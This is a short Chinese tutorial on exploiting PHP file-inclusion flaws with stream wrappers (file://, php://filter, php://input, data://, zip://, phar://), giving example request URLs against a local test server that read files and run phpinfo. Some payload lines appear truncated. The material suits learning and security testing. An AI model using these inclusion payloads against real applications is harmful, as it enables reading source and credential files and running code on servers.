当前位置: 首页 > article >正文

文件包含PHP伪协议利用方法

首先我们需要把配置文件php.ini

在 php.ini ⾥有两个重要的参数 allow_url_fopen 、allow_url_include;

allow_url_fopen:默认值是 ON。允许 url ⾥的封装协议访问⽂件;

allow_url_include:默认值是 OFF。不允许包含 url ⾥的封装协议包含⽂件;

file://协议

file://⽂件的绝对路径和⽂件名

127.0.0.1/1.php?cmd=file://F:/sxy/phpstudy_pro/WWW/1.txt

 php://filter协议

127.0.0.1/1.php?cmd=php://filter/read=convert.base64-encode/resource=1.txt

进行base64解密

php://input协议

抓包进来这里是get传参右击修改

然后构造语句

放包回来就可以看到phpinfo了

data://

使⽤举例: ?file=data:text/plain,

?file=data:text/plain;base64, PD9waHAgcGhwaW5mbygpPz4=

?file=data:text/plain,

?cmd=data:text/plain,<?php%20phpinfo();?>

zip://

把1.txt压缩成zip文件

不能直接读取压缩包内的文件需要在中间加个%23

127.0.0.1/1.php?cmd=zip://1.zip%231.txt构造语句进行读取

phar://

⽤途:读取压缩包内的⽂件(绝对路径/相对路径)

它可以直接读取压缩包内的文件

127.0.0.1/1.php?cmd=phar://1.zip/1.txt


http://www.kler.cn/a/289648.html

相关文章:

  • STM32嵌入式闹钟系统设计与实现
  • 华为数通HCIA系列第5次考试-【2024-46周-周一】
  • Mysql 8迁移到达梦DM8遇到的报错
  • 卸载一直显示在运行的应用
  • 计算机的错误计算(一百五十二)
  • aws xray通过设置采样规则对请求进行过滤
  • SEO外链自动发布外链工具网站源码
  • 深度学习应用 - 语音识别篇
  • 基于web知识库管理系统设计与实现
  • 通过EasyExcel设置自定义表头及设置特定单元格样式、颜色
  • C++:关于反向迭代器的学习分享
  • 缓存类型以及读写策略
  • RocketMQ高级特性三-消费者分类
  • java 常用并发队列- ArrayBlockingQueue
  • malab 将数据导入到excell文件代码的几种方法
  • LeetCode hot100刷题记录
  • LACP链路聚合
  • Android 9.0 SystemUI状态栏/快捷设置介绍
  • 【网络原理】Udp 的报文结构,保姆式教学,快速入门
  • 计算机网络 第2章 物理层
  • 多个Node.js版本之间切换
  • css spacing设置间距
  • redis缓存和数据库通过延迟双删除实现数据一致性
  • Ghidra逆向工具之旅与二进制代码分析【4】
  • 通过设置JVM参数来启用GC(垃圾回收)日志
  • Super Image 2.1.0 图像处理软件,修复老照片、无损放大、智能修复,本地处理保护隐私